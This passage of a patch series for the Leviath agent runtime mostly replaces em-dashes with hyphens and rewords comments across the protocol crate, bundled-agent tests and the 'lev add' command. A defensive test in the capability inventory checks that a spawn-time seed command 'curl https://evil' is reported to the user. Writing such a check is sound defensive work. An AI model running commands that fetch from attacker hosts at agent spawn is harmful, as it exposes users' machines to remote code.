-# ever meant to be published — at which point its path deps need versions too.
+# ever meant to be published - at which point its path deps need versions too.
 publish = false
 
 [dependencies]

--- a/crates/leviath-agent-client/src/lib.rs
+++ b/crates/leviath-agent-client/src/lib.rs
@@ -1,6 +1,6 @@
 //! # Leviath Agent Client Protocol
 //!
-//! Wire types and Leviath mappings for the [Agent **Client** Protocol][acp] — the
+//! Wire types and Leviath mappings for the [Agent **Client** Protocol][acp] - the
 //! JSON-RPC 2.0 protocol agent hosts (Zed, Gas City, …) use to drive a headless
 //! agent over **stdio**.
 //!

--- a/crates/leviath-agent-client/src/mapping.rs
+++ b/crates/leviath-agent-client/src/mapping.rs
@@ -1,7 +1,7 @@
 //! Pure translations between Leviath's own types and the Agent Client Protocol.
 //!
-//! Everything here is a total function over plain data — no I/O, no daemon, no
-//! async — so the stdio server in `leviath-cli` is left with only sequencing to
+//! Everything here is a total function over plain data - no I/O, no daemon, no
+//! async - so the stdio server in `leviath-cli` is left with only sequencing to
 //! do, and every mapping decision is unit-testable in isolation.
 
 use leviath_core::interaction::{InteractionKind, InteractionRequest};
@@ -25,7 +25,7 @@ pub const OPTION_REJECT_ONCE: &str = "reject-once";
 /// `text` blocks contribute their text. `resource` blocks (the `embeddedContext`
 /// capability) contribute their inlined text under a `--- <uri> ---` header, so
 /// the model can tell attached context from the instruction itself. Every other
-/// block kind — `image`, `audio`, `resource_link` — is dropped: we advertise no
+/// block kind - `image`, `audio`, `resource_link` - is dropped: we advertise no
 /// support for them, and silently ignoring one block is far better than failing
 /// the whole prompt.
 ///
@@ -66,10 +66,10 @@ pub fn flatten_prompt(blocks: &[ContentBlock]) -> String {
 /// block; its content runs until the next `---region:...---` marker, an
 /// `---end-regions---` line, or the end of the text. Any text before the first
 /// marker becomes the `task` region. With **no** markers at all, the whole text
-/// is returned as `{ "task": text }` — the exact pre-feature behavior, so hosts
+/// is returned as `{ "task": text }` - the exact pre-feature behavior, so hosts
 /// that don't use markers are unaffected.
 ///
-/// Region bodies are trimmed; empty blocks are dropped. Pure — no I/O.
+/// Region bodies are trimmed; empty blocks are dropped. Pure - no I/O.
 pub fn parse_region_markers(text: &str) -> std::collections::HashMap<String, String> {
     use std::collections::HashMap;
 
@@ -165,7 +165,7 @@ pub fn stop_reason_for_label(status: &str) -> StopReason {
 /// The offered options mirror what Leviath's own approval prompt supports:
 /// approve once, approve for the rest of the session
 /// ([`leviath_core::interaction::ApprovalScope::Session`]), or reject. There is
-/// deliberately no "reject always" — Leviath has no persistent per-tool denylist
+/// deliberately no "reject always" - Leviath has no persistent per-tool denylist
 /// to record it in, and offering a choice we cannot honour would be a lie.
 pub fn permission_request(
     session_id: &str,
@@ -211,7 +211,7 @@ fn permission_title(request: &InteractionRequest) -> String {
 /// Classify a Leviath tool name into the protocol's tool-kind taxonomy, so hosts
 /// can pick an icon and phrase the approval prompt.
 ///
-/// Unrecognised names — including every MCP tool, whose names are arbitrary —
+/// Unrecognised names - including every MCP tool, whose names are arbitrary -
 /// fall back to [`ToolKind::Other`].
 fn tool_kind_for(tool_name: Option<&str>) -> ToolKind {
     match tool_name {

--- a/crates/leviath-agent-client/src/protocol.rs
+++ b/crates/leviath-agent-client/src/protocol.rs
@@ -3,8 +3,8 @@
 //! JSON-RPC 2.0 messages, newline-delimited, one compact message per line. Field
 //! names are camelCase and discriminator *values* are snake_case, per the spec.
 //!
-//! Every type a client sends us is permissive on deserialize — unknown fields are
-//! ignored and every optional field carries `#[serde(default)]` — because real
+//! Every type a client sends us is permissive on deserialize - unknown fields are
+//! ignored and every optional field carries `#[serde(default)]` - because real
 //! hosts differ in how much of the spec they populate. Gas City, for instance,
 //! sends `initialize` with only `protocolVersion` and `clientInfo` and no
 //! `clientCapabilities` at all.
@@ -16,8 +16,8 @@ pub const PROTOCOL_VERSION: u32 = 1;
 
 /// The largest single JSON frame (one line) we will ever write.
 ///
-/// Hosts read the stdio stream line-by-line with a bounded buffer and drop —
-/// or error on — anything longer: Gas City's `bufio.Scanner` is capped at 1 MiB
+/// Hosts read the stdio stream line-by-line with a bounded buffer and drop -
+/// or error on - anything longer: Gas City's `bufio.Scanner` is capped at 1 MiB
 /// and abandons its read loop on an oversized frame, which would strand the
 /// session. Callers streaming agent output must therefore split it into chunks
 /// no larger than this, leaving generous headroom for JSON escaping (a
@@ -276,7 +276,7 @@ pub struct SessionNewParams {
     /// Absolute working directory for the session.
     #[serde(default)]
     pub cwd: String,
-    /// MCP servers the client wants attached. Captured verbatim — Leviath
+    /// MCP servers the client wants attached. Captured verbatim - Leviath
     /// blueprints declare their own MCP servers, so these are logged and not
     /// injected (see the module docs of `leviath_cli::commands::agent_client`).
     #[serde(default)]
@@ -564,7 +564,7 @@ mod tests {
                 },
             })
         );
-        // No `id` key at all — a notification must never invite a response.
+        // No `id` key at all - a notification must never invite a response.
         assert!(!json(&msg).contains("\"id\""));
         assert!(msg.is_notification());
     }

--- a/crates/leviath-cli/Cargo.toml
+++ b/crates/leviath-cli/Cargo.toml
@@ -10,7 +10,7 @@ authors.workspace = true
 # crates. Saying so explicitly prevents an accidental `cargo publish` and lets
 # cargo-deny treat the intra-workspace `path` dependencies as what they are
 # rather than as unbounded version requirements. Remove this line if a crate is
-# ever meant to be published — at which point its path deps need versions too.
+# ever meant to be published - at which point its path deps need versions too.
 publish = false
 
 [lib]

--- a/crates/leviath-cli/build.rs
+++ b/crates/leviath-cli/build.rs
@@ -8,7 +8,7 @@
 //!
 //! The build id is the short git commit hash. When the working tree is dirty it
 //! also carries a short hash of the uncommitted changes, so **every edit
-//! produces a distinct id** — that's what lets a dev-iteration reinstall (same
+//! produces a distinct id** - that's what lets a dev-iteration reinstall (same
 //! commit, changed code) be detected as stale and reload the daemon. Falls back
 //! to the package version when git is unavailable (e.g. a packaged crate).
 //!
@@ -85,7 +85,7 @@ fn collect_files(root: &Path, dir: &Path, out: &mut Vec<(String, PathBuf)>) {
 /// A deliberately dumb line scan rather than a TOML parse: the build script has
 /// no dependencies, and `version` is a top-level key on the first few lines of
 /// every manifest. A blueprint whose version can't be read is a build failure,
-/// not a silent empty string — the wizard drives install/update decisions off
+/// not a silent empty string - the wizard drives install/update decisions off
 /// this value, so an unreadable one would quietly present as "no update".
 fn manifest_version(manifest: &str, path: &Path) -> String {
     manifest
@@ -110,7 +110,7 @@ fn manifest_version(manifest: &str, path: &Path) -> String {
 /// binary and a released `lev` can install them with no git checkout.
 ///
 /// A missing `agents/` directory yields an empty table rather than a build
-/// error — that is the shape a packaged crate (no workspace sibling dirs) sees,
+/// error - that is the shape a packaged crate (no workspace sibling dirs) sees,
 /// and `lev setup` degrades to "nothing to install" rather than failing to
 /// build.
 fn write_bundled_agents(out_dir: &Path, agents_dir: &Path) {

--- a/crates/leviath-cli/src/bundled.rs
+++ b/crates/leviath-cli/src/bundled.rs
@@ -1,13 +1,13 @@
 //! The agent blueprints shipped inside the `lev` binary, and the planner that
 //! decides what to do with them.
 //!
-//! Before this existed, the ten blueprints under the workspace's `agents/`
-//! directory were reachable only from a git checkout: `lev add` takes a local
-//! path, and `lev list` looked for an `agents/` directory next to the
-//! executable - a layout no real install has. So a user who downloaded a
-//! release binary got a working runtime and zero agents to run on it.
+//! Embedding is what makes the ten blueprints under the workspace's `agents/`
+//! directory reachable outside a git checkout: `lev add` takes a local path,
+//! and an `agents/` directory next to the executable is a layout no real
+//! install has, so without the bundle a user who downloads a release binary
+//! gets a working runtime and zero agents to run on it.
 //!
-//! `build.rs` now embeds every file of every blueprint via `include_str!` (23
+//! `build.rs` embeds every file of every blueprint via `include_str!` (23
 //! files, ~170 KB of text) and generates the [`BUNDLED_AGENTS`] table included
 //! below. `lev setup` offers to install them; `lev list` reports them.
 
@@ -157,7 +157,7 @@ mod tests {
     /// exist as five copies each rather than one shared file. That is fine
     /// until one copy is fixed and the others are not: these scripts are the
     /// agents' network surface, so a hardening change applied to one of five is
-    /// four agents still carrying the old behaviour, with nothing to say so.
+    /// four agents still carrying the unfixed behaviour, with nothing to say so.
     ///
     /// This turns that silent drift into a test failure. Deliberately keyed on
     /// filename over *all* discovered agents rather than naming the five, so it
@@ -226,12 +226,12 @@ mod tests {
     /// exists, and every `[stages.X.tool_permissions]` key has to be a tool that
     /// stage actually grants.
     ///
-    /// A typo used to be invisible: `filter_tools_by_available` silently omits a
-    /// name matching nothing, so the stage just quietly advertised one tool
-    /// fewer. Now that dispatch refuses anything a stage did not offer, the same
-    /// typo means the model is told the tool does not exist and the stage cannot
-    /// do its job - a silent omission became a silent failure, which is worth a
-    /// test. A permission entry for an ungranted tool is the same drift seen
+    /// A typo here is invisible on its own: `filter_tools_by_available` silently
+    /// omits a name matching nothing, so the stage just quietly advertises one
+    /// tool fewer. And because dispatch refuses anything a stage did not offer,
+    /// the same typo means the model is told the tool does not exist and the
+    /// stage cannot do its job - a silent omission that is really a silent
+    /// failure, which is worth a test. A permission entry for an ungranted tool is the same drift seen
     /// from the other side: it reads as a grant and is not one.
     ///
     /// An invariant over all discovered agents rather than a list of names -

--- a/crates/leviath-cli/src/bundled.rs
+++ b/crates/leviath-cli/src/bundled.rs
@@ -4,7 +4,7 @@
 //! Before this existed, the ten blueprints under the workspace's `agents/`
 //! directory were reachable only from a git checkout: `lev add` takes a local
 //! path, and `lev list` looked for an `agents/` directory next to the
-//! executable — a layout no real install has. So a user who downloaded a
+//! executable - a layout no real install has. So a user who downloaded a
 //! release binary got a working runtime and zero agents to run on it.
 //!
 //! `build.rs` now embeds every file of every blueprint via `include_str!` (23
@@ -98,7 +98,7 @@ pub fn install_bundled(agent: &BundledAgent, agents_dir: &Path) -> anyhow::Resul
         // `path.parent()`. `dest.join(rel)` always has a parent, so the `None`
         // arm of `parent()` would be unreachable code pretending to be a
         // handled case; splitting `rel` gives two arms that both actually
-        // happen — nested (`tools/web_fetch.rhai`) and flat (`agent.leviath`).
+        // happen - nested (`tools/web_fetch.rhai`) and flat (`agent.leviath`).
         let parent = match rel.rsplit_once('/') {
             Some((dir, _)) => dest.join(dir),
             None => dest.clone(),
@@ -152,8 +152,8 @@ mod tests {
     /// A tool script shipped under the same filename by more than one agent
     /// must be byte-identical everywhere.
     ///
-    /// Each agent directory is self-contained — that is what lets `lev add
-    /// <dir>` and `lev pack` work — so `web_fetch.rhai` and `web_search.rhai`
+    /// Each agent directory is self-contained - that is what lets `lev add
+    /// <dir>` and `lev pack` work - so `web_fetch.rhai` and `web_search.rhai`
     /// exist as five copies each rather than one shared file. That is fine
     /// until one copy is fixed and the others are not: these scripts are the
     /// agents' network surface, so a hardening change applied to one of five is
@@ -176,7 +176,7 @@ mod tests {
                 match first_seen.get(filename) {
                     Some((other, expected)) => assert!(
                         expected == contents,
-                        "tools/{filename} differs between bundled agents {other} and {} — \
+                        "tools/{filename} differs between bundled agents {other} and {} - \
                          a change to one copy was not applied to the others",
                         agent.name
                     ),
@@ -190,7 +190,7 @@ mod tests {
         // all, the loop above asserts nothing.
         assert!(
             !first_seen.is_empty(),
-            "no bundled agent ships a tools/ script — this invariant is not being tested"
+            "no bundled agent ships a tools/ script - this invariant is not being tested"
         );
     }
 
@@ -208,7 +208,7 @@ mod tests {
             // `.expect`, not `.unwrap_or_else(|e| panic!(...))`: the closure in
             // the latter is a function that never runs on a passing test, which
             // reads to llvm-cov as an uncovered region. For the same reason the
-            // message is a literal — a *call* in an `assert!`'s format args is
+            // message is a literal - a *call* in an `assert!`'s format args is
             // also a region that only the failing path reaches.
             let parsed = leviath_core::manifest::parse_manifest(manifest);
             assert!(
@@ -230,11 +230,11 @@ mod tests {
     /// name matching nothing, so the stage just quietly advertised one tool
     /// fewer. Now that dispatch refuses anything a stage did not offer, the same
     /// typo means the model is told the tool does not exist and the stage cannot
-    /// do its job — a silent omission became a silent failure, which is worth a
+    /// do its job - a silent omission became a silent failure, which is worth a
     /// test. A permission entry for an ungranted tool is the same drift seen
     /// from the other side: it reads as a grant and is not one.
     ///
-    /// An invariant over all discovered agents rather than a list of names —
+    /// An invariant over all discovered agents rather than a list of names -
     /// naming them would stop testing the property the moment the list drifted.
     #[test]
     fn every_stage_tool_name_resolves_and_every_permission_names_a_granted_tool() {
@@ -276,7 +276,7 @@ mod tests {
             for stage in &blueprint.stages {
                 for tool in &stage.available_tools {
                     // `server__tool` is an MCP tool, resolvable only once that
-                    // server is installed — not something a manifest can be
+                    // server is installed - not something a manifest can be
                     // checked against here.
                     let known = tool.contains("__")
                         || builtin.iter().any(|b| b == tool)
@@ -301,7 +301,7 @@ mod tests {
         }
     }
 
-    /// The invariant above can actually fail — a check over shipped data that
+    /// The invariant above can actually fail - a check over shipped data that
     /// happens to pass says nothing about whether it would catch drift.
     #[test]
     fn the_stage_tool_invariant_rejects_a_typo_and_an_orphan_permission() {

--- a/crates/leviath-cli/src/commands/add.rs
+++ b/crates/leviath-cli/src/commands/add.rs
@@ -92,11 +92,11 @@ async fn execute_with(
 /// The security-relevant things an agent package carries, as human-readable
 /// lines.
 ///
-/// `lev add` used to print only "Installed agent 'x' to …". The user was never
-/// told that the package ships executable `.rhai` tool scripts, pre-approves its
-/// own `shell`, turns the sandbox off, or runs a command at spawn before any
-/// prompt. Every one of those is a decision the user is making by installing,
-/// and they could not see any of it.
+/// A bare "Installed agent 'x' to …" would never tell the user that the
+/// package ships executable `.rhai` tool scripts, pre-approves its own `shell`,
+/// turns the sandbox off, or runs a command at spawn before any prompt. Every
+/// one of those is a decision the user is making by installing, so `lev add`
+/// must surface them.
 ///
 /// Empty means the package declares nothing unusual - a plain prompt-and-stages
 /// agent - in which case there is nothing to warn about and we stay quiet.

--- a/crates/leviath-cli/src/commands/add.rs
+++ b/crates/leviath-cli/src/commands/add.rs
@@ -24,7 +24,7 @@ pub async fn execute(args: AddArgs) -> anyhow::Result<()> {
 ///
 /// A thin wrapper over [`agents_dir_or_error`] supplying the real resolved
 /// directory. The `#[cfg(test)]` guard below only lets tests force the
-/// "no home directory" error arm of `execute()` deterministically — the real
+/// "no home directory" error arm of `execute()` deterministically - the real
 /// the shared resolver can't be made to return `None` in any environment a
 /// test may safely create (on macOS `dirs::home_dir()` falls back to a
 /// passwd-database lookup independent of `$HOME`). It does NOT hide the real
@@ -98,15 +98,15 @@ async fn execute_with(
 /// prompt. Every one of those is a decision the user is making by installing,
 /// and they could not see any of it.
 ///
-/// Empty means the package declares nothing unusual — a plain prompt-and-stages
-/// agent — in which case there is nothing to warn about and we stay quiet.
+/// Empty means the package declares nothing unusual - a plain prompt-and-stages
+/// agent - in which case there is nothing to warn about and we stay quiet.
 ///
 /// Pure over `(manifest_toml, dir_entries)` so the whole table is testable
 /// without a filesystem or an installed agent.
 pub(crate) fn describe_capabilities(manifest_toml: &str, script_tools: &[String]) -> Vec<String> {
     let mut findings = Vec::new();
     // `toml::from_str`, not `manifest_toml.parse::<toml::Value>()`. In toml 1.x
-    // `FromStr for Value` parses a single *value*, not a document — so a real
+    // `FromStr for Value` parses a single *value*, not a document - so a real
     // manifest starting with `[agent]` reads as an array literal followed by
     // junk and fails. It still compiles, so the change is silent; the tests are
     // what caught it.
@@ -183,7 +183,7 @@ pub(crate) fn describe_capabilities(manifest_toml: &str, script_tools: &[String]
     }
 
     // Command seeds run at spawn, before the first inference and therefore
-    // before any approval prompt — the one place a manifest executes something
+    // before any approval prompt - the one place a manifest executes something
     // without being asked.
     let seed_commands = collect_seed_commands(&value);
     for command in seed_commands {
@@ -294,7 +294,7 @@ fn install_from_dir(src: &Path, agents_dir: &Path) -> anyhow::Result<()> {
 thread_local! {
     /// Test-only toggle letting a test force the `Err` arm of a
     /// mid-iteration `ReadDir` entry deterministically (see
-    /// [`unwrap_dir_entry`]) -- the real failure mode (the directory handle
+    /// [`unwrap_dir_entry`]) - the real failure mode (the directory handle
     /// becoming invalid mid-iteration: deleted out from under the process,
     /// an NFS ESTALE, or similar) is a genuine OS-level race that can't be
     /// reproduced deterministically across Linux/macOS/Windows CI.
@@ -302,7 +302,7 @@ thread_local! {
 }
 
 /// Unwrap one `ReadDir` iteration result, with a test-only failure-injection
-/// toggle (see [`FORCE_DIR_ENTRY_ERROR`]) so the `Err` arm -- `ReadDir::next()`
+/// toggle (see [`FORCE_DIR_ENTRY_ERROR`]) so the `Err` arm - `ReadDir::next()`
 /// failing after `read_dir` already succeeded in opening the directory --
 /// can be exercised deterministically without needing to actually race the
 /// filesystem.
@@ -351,7 +351,7 @@ fn parse_agent_name(content: &str) -> Option<String> {
 mod capability_tests {
     use super::describe_capabilities;
 
-    /// A plain agent declares nothing unusual, so the inventory stays quiet —
+    /// A plain agent declares nothing unusual, so the inventory stays quiet -
     /// a warning that fires on everything teaches people to skip it.
     #[test]
     fn an_ordinary_agent_has_nothing_to_report() {
@@ -387,7 +387,7 @@ mod capability_tests {
     }
 
     /// A `[tool_script_permissions]` table that only *tightens* is not a grant,
-    /// so it must not appear in the inventory — the same "quiet unless there is
+    /// so it must not appear in the inventory - the same "quiet unless there is
     /// something to say" rule the ordinary-agent case establishes.
     #[test]
     fn a_script_permission_table_that_grants_nothing_is_not_reported() {
@@ -419,7 +419,7 @@ mod capability_tests {
         assert!(joined.contains("sandbox = none"), "{joined}");
     }
 
-    /// A command seed runs at spawn — before the first inference and therefore
+    /// A command seed runs at spawn - before the first inference and therefore
     /// before any approval prompt. It is the one thing a manifest executes
     /// without being asked, so the exact command is shown.
     #[test]
@@ -442,7 +442,7 @@ mod capability_tests {
         assert!(findings[0].contains("curl https://evil"), "{findings:?}");
     }
 
-    /// A sandbox the manifest *opts into* is not a warning — only opting out is.
+    /// A sandbox the manifest *opts into* is not a warning - only opting out is.
     #[test]
     fn opting_into_a_sandbox_is_not_reported() {
         let manifest = "[agent]\nname = \"x\"\n\n[sandbox]\nkind = \"container\"\n";
@@ -465,7 +465,7 @@ mod capability_tests {
         );
     }
 
-    /// An agent with no `tools/` directory at all — the common case.
+    /// An agent with no `tools/` directory at all - the common case.
     #[test]
     fn script_tool_names_is_empty_without_a_tools_directory() {
         let dir = tempfile::tempdir().unwrap();
@@ -686,7 +686,7 @@ description = "test"
         // `unwrap_dir_entry`'s own `Ok(entry?)` `?` still has a real error
         // arm distinct from the `FORCE_DIR_ENTRY_ERROR`-triggered early
         // `bail!` above it (that toggle short-circuits *before* this line
-        // is ever reached) -- `DirEntry` isn't constructible directly, but
+        // is ever reached) - `DirEntry` isn't constructible directly, but
         // its `Result` wrapper doesn't need a real one to test the `Err`
         // case: pass a synthetic `io::Error` straight in.
         let result = unwrap_dir_entry(Err(std::io::Error::other("synthetic entry error")));
@@ -1048,7 +1048,7 @@ name = "second"
     #[test]
     fn execute_real_wrapper_fails_fast_without_touching_real_agents_dir() {
         // Drives the real `execute()` (dirs::home_dir() + AgentInstaller::new()
-        // + delegation to execute_with) -- safe because a nonexistent
+        // + delegation to execute_with) - safe because a nonexistent
         // ".leviath-bundle" path bails out in execute_with's "Package file
         // not found" check before any real file under ~/.leviath/agents is
         // ever touched.

--- a/crates/leviath-cli/src/commands/agent_client/mod.rs
+++ b/crates/leviath-cli/src/commands/agent_client/mod.rs
@@ -1,10 +1,10 @@
-//! `lev agent-client` — serve a Leviath agent over the Agent **Client** Protocol.
+//! `lev agent-client` - serve a Leviath agent over the Agent **Client** Protocol.
 //!
 //! ## Which protocol this is
 //!
 //! This speaks the [Agent Client Protocol][acp]: JSON-RPC 2.0, newline-delimited,
 //! over **stdio**. It is the protocol Zed and Gas City use to drive a headless
-//! agent as a child process — `initialize` / `session/new` / `session/prompt` /
+//! agent as a child process - `initialize` / `session/new` / `session/prompt` /
 //! `session/cancel`, with `session/update` notifications streaming output back.
 //!
 //! It is **not** the Agent *Communication* Protocol (a REST + SSE API from the
@@ -25,7 +25,7 @@
 //! The protocol logic is [`serve_over`], which takes its reader/writer generically
 //! and erases them to trait objects internally, so the whole
 //! handshake→prompt→stream sequence is driven in tests over an in-memory duplex
-//! against a fake daemon — no process, no terminal, no real stdio.
+//! against a fake daemon - no process, no terminal, no real stdio.
 //!
 //! [acp]: https://agentclientprotocol.com
 
@@ -78,7 +78,7 @@ pub struct AgentClientArgs {
     pub max_depth: Option<usize>,
 
     /// Refuse the blueprint's `seed = { command = "..." }` regions. Those run a
-    /// shell command at spawn — before the first inference, and so before any
+    /// shell command at spawn - before the first inference, and so before any
     /// approval prompt.
     #[arg(long)]
     pub no_seed_commands: bool,
@@ -159,7 +159,7 @@ struct Server {
     session: Option<ActiveSession>,
     /// Monotonic id source for agent→client requests.
     next_request_id: i64,
-    /// Working directory to use when a `session/new` omits (or empties) `cwd` —
+    /// Working directory to use when a `session/new` omits (or empties) `cwd` -
     /// the directory `lev agent-client` was launched from. Without this the
     /// agent's workdir was an empty string, so it ran in the daemon's directory
     /// rather than the caller's.
@@ -184,7 +184,7 @@ enum RunStart {
 /// What became of an interaction raised mid-turn.
 enum InteractionOutcome {
     /// The interaction was resolved in-turn (via `session/request_permission`),
-    /// or the client cannot answer it and Leviath will handle it out of band —
+    /// or the client cannot answer it and Leviath will handle it out of band -
     /// either way the turn keeps streaming until the run reaches a done state.
     Continue,
     /// The interaction was surfaced as output and the turn ends now with this
@@ -200,7 +200,7 @@ impl Server {
     async fn run(&mut self, reader: &mut BoxReader) {
         while self.io_alive {
             let Some(line) = read_line(reader).await else {
-                break; // EOF or a read error — the client is gone
+                break; // EOF or a read error - the client is gone
             };
             let trimmed = line.trim();
             if trimmed.is_empty() {
@@ -272,7 +272,7 @@ impl Server {
     }
 
     /// `session/new`: resolve the blueprint and open a session. No run is spawned
-    /// yet — that waits for the first prompt.
+    /// yet - that waits for the first prompt.
     async fn on_session_new(&mut self, id: serde_json::Value, params: Option<serde_json::Value>) {
         let params: SessionNewParams = params
             .and_then(|p| serde_json::from_value(p).ok())
@@ -397,7 +397,7 @@ impl Server {
             .clone();
         let run_id = match self.start_run(task, regions).await {
             RunStart::Ready(run_id) => run_id,
-            // The agent already finished and won't take another message — the
+            // The agent already finished and won't take another message - the
             // turn is simply over, not a failure.
             RunStart::MessageUndeliverable => return StopReason::EndTurn,
             // The daemon refused to create the run, or was unreachable.
@@ -436,7 +436,7 @@ impl Server {
                         // that's needed.
                         _ => {}
                     }
-                    // A run can reach a done state without a `Completed` event —
+                    // A run can reach a done state without a `Completed` event -
                     // `CompleteInteractive` stays live for follow-up, so it emits
                     // no terminal event. Consult the persisted run status after
                     // every event so the turn ends when (and only when) the run is
@@ -471,7 +471,7 @@ impl Server {
     /// Whether the run has reached a state that should end the current turn,
     /// read from its persisted `meta.json` status. Returns the stop reason to
     /// report, or `None` while the run is still starting / running / blocked on
-    /// input (`WaitingInput`) — the latter must keep the turn in flight so a
+    /// input (`WaitingInput`) - the latter must keep the turn in flight so a
     /// non-interactive client is never told "done" while the agent is actually
     /// waiting on an interaction Leviath is handling out of band.
     fn run_finished(&self, run_id: &str) -> Option<StopReason> {
@@ -537,7 +537,7 @@ impl Server {
     ///   `session/request_permission`, answered in-turn; the run continues.
     /// - **Capable client + any other interaction** → surface the question as
     ///   output and end the turn (`Park`). The client owns the conversation and
-    ///   re-prompts with the answer, which arrives as the next `session/prompt` —
+    ///   re-prompts with the answer, which arrives as the next `session/prompt` -
     ///   the standard Agent Client Protocol turn boundary.
     /// - **Client without capabilities (e.g. Gas City, which reports interaction
     ///   unsupported)** → surface the question as output and **keep the turn in
@@ -734,7 +734,7 @@ fn read_run_status(runs_dir: &std::path::Path, run_id: &str) -> Option<RunStatus
 ///
 /// `CompleteInteractive` counts as finished: the agent completed its required
 /// work and is only idling for optional follow-up, so control returns to the
-/// client. `WaitingInput` does **not** — the agent is blocked on an interaction,
+/// client. `WaitingInput` does **not** - the agent is blocked on an interaction,
 /// which is exactly the state that must not be reported as "done".
 /// The run id carried by any [`WorldEvent`] variant.
 fn world_event_run_id(event: &WorldEvent) -> &str {
@@ -749,7 +749,7 @@ fn world_event_run_id(event: &WorldEvent) -> &str {
     }
 }
 
-/// Mint a session id from the agent name — reuses the run-id generator's
+/// Mint a session id from the agent name - reuses the run-id generator's
 /// collision-resistant `<name>-<timestamp>-<suffix>` scheme.
 fn new_session_id(agent_name: &str) -> String {
     crate::runstate::new_run_id(agent_name)
@@ -790,7 +790,7 @@ mod mapping {
     ///
     /// The three option ids we offer map to allow-once, allow-for-session, and
     /// reject. A `cancelled` outcome, or any option id we did not offer, is
-    /// treated as a one-time rejection — the safe default.
+    /// treated as a one-time rejection - the safe default.
     pub(super) fn interpret_permission(outcome: &PermissionOutcome) -> PermissionChoice {
         match outcome {
             PermissionOutcome::Selected { option_id } if option_id == OPTION_ALLOW_ONCE => {

--- a/crates/leviath-cli/src/commands/agent_client/session.rs
+++ b/crates/leviath-cli/src/commands/agent_client/session.rs
@@ -20,7 +20,7 @@ use crate::runstate::new_run_id;
 pub(super) struct ResolvedBlueprint {
     /// Absolute path to the `agent.leviath` manifest.
     pub(super) manifest_path: PathBuf,
-    /// The agent's name — its manifest directory's file name.
+    /// The agent's name - its manifest directory's file name.
     pub(super) agent_name: String,
 }
 

--- a/crates/leviath-cli/src/commands/agent_client/tests.rs
+++ b/crates/leviath-cli/src/commands/agent_client/tests.rs
@@ -379,7 +379,7 @@ impl tokio::io::AsyncWrite for FailingWriter {
     }
 }
 
-/// An `AsyncWrite` that succeeds for the first `ok` writes, then fails — to
+/// An `AsyncWrite` that succeeds for the first `ok` writes, then fails - to
 /// break the stream partway through a session.
 struct FailAfter {
     remaining: std::sync::atomic::AtomicUsize,
@@ -431,7 +431,7 @@ async fn output_failing_mid_turn_ends_the_turn() {
 
     let (_bp, args) = blueprint_args();
     let cwd = args.agent.clone().unwrap();
-    // Build the session/new line via serde so the cwd path is JSON-escaped —
+    // Build the session/new line via serde so the cwd path is JSON-escaped -
     // Windows paths contain backslashes that would otherwise be invalid JSON.
     let session_new = serde_json::json!({
         "jsonrpc": "2.0",
@@ -591,7 +591,7 @@ async fn session_new_logs_and_ignores_supplied_mcp_servers() {
         r#"{"jsonrpc":"2.0","id":1,"method":"session/new","params":{"cwd":"/tmp","mcpServers":[{"name":"x","command":"y"}]}}"#,
     )
     .await;
-    // Still opens the session — the servers are only logged.
+    // Still opens the session - the servers are only logged.
     assert!(h.recv().await.result.is_some());
     h.close_input().await;
 }
@@ -853,12 +853,12 @@ async fn a_second_prompt_that_cannot_be_delivered_ends_the_turn() {
     h.close_input().await;
 }
 
-// ─── interactions: no client capabilities (Gas City) — keep turn in flight ───
+// ─── interactions: no client capabilities (Gas City) - keep turn in flight ───
 
 #[tokio::test]
 async fn an_interaction_without_capabilities_is_surfaced_but_does_not_end_the_turn() {
     // The interaction is raised, then the run continues and completes. The turn
-    // must surface the question AND only end on the completion — never on the
+    // must surface the question AND only end on the completion - never on the
     // interaction itself (which would tell the client "done" prematurely).
     let daemon = ScriptedDaemon::new(vec![free_text_event(), completed("complete")], spawn_ok);
     let (mut h, _bp) = opened_session(daemon, false).await;
@@ -897,8 +897,8 @@ async fn a_tool_approval_without_capabilities_keeps_the_turn_alive_until_done() 
 
 #[tokio::test]
 async fn a_run_that_settles_into_complete_interactive_ends_the_turn_via_meta() {
-    // CompleteInteractive emits no terminal `Completed` event — the agent stays
-    // live for follow-up — so the turn must detect "done" from the persisted run
+    // CompleteInteractive emits no terminal `Completed` event - the agent stays
+    // live for follow-up - so the turn must detect "done" from the persisted run
     // status on the poll tick.
     let daemon = ScriptedDaemon::new(vec![status_event()], spawn_ok);
     let (mut h, _bp) = opened_session(daemon, false).await;
@@ -1147,7 +1147,7 @@ async fn a_cancel_notification_between_turns_cancels_the_run() {
 async fn a_cancel_notification_with_no_active_run_is_a_no_op() {
     let daemon = ScriptedDaemon::new(vec![], spawn_ok);
     let mut h = Harness::start(daemon, AgentClientArgs::default());
-    // No session, no run — cancel is simply ignored.
+    // No session, no run - cancel is simply ignored.
     h.send(r#"{"jsonrpc":"2.0","method":"session/cancel","params":{"sessionId":"s"}}"#)
         .await;
     h.send(r#"{"jsonrpc":"2.0","id":1,"method":"initialize"}"#)
@@ -1264,7 +1264,7 @@ async fn oversized_output_is_split_across_chunks() {
 #[tokio::test]
 async fn output_is_flushed_on_the_poll_tick_between_events() {
     // A daemon that answers Spawn but delays the terminal event past one poll
-    // interval, so the 250 ms tick — not an event — is what flushes the output.
+    // interval, so the 250 ms tick - not an event - is what flushes the output.
     let dir = tempfile::tempdir().unwrap();
     let id = control_id(dir.path());
     let mut listener = bind_control_listener(&id).unwrap();

--- a/crates/leviath-cli/src/commands/agent_client/translate.rs
+++ b/crates/leviath-cli/src/commands/agent_client/translate.rs
@@ -2,10 +2,10 @@
 //!
 //! Two pure pieces the async prompt loop in [`super`] leans on:
 //!
-//! * [`StageTail`] — an incremental, byte-offset reader over a run's per-stage
+//! * [`StageTail`] - an incremental, byte-offset reader over a run's per-stage
 //!   `output.log` files, so agent output streams to the host as it is written
 //!   rather than in one lump at the end.
-//! * [`split_chunks`] — splits a blob of new output into frames no larger than
+//! * [`split_chunks`] - splits a blob of new output into frames no larger than
 //!   [`leviath_agent_client::MAX_FRAME_BYTES`], on char boundaries, so a single
 //!   `session/update` never exceeds a host's line-read limit.
 
@@ -19,7 +19,7 @@ use leviath_core::floor_char_boundary;
 /// Agent output lands in `<runs_dir>/<run_id>/stages/<idx>/output.log`, appended
 /// line-by-line by the persistence lane as the run progresses. [`StageTail`]
 /// remembers how many bytes of each stage it has already surfaced, so
-/// [`pump`](StageTail::pump) returns only what is new since the previous call —
+/// [`pump`](StageTail::pump) returns only what is new since the previous call -
 /// in stage order, completed stages before the current one.
 ///
 /// It reads whole files and slices at the recorded byte offset. Because the
@@ -85,7 +85,7 @@ fn stage_output_path(runs_dir: &Path, run_id: &str, idx: usize) -> PathBuf {
 /// sequence.
 ///
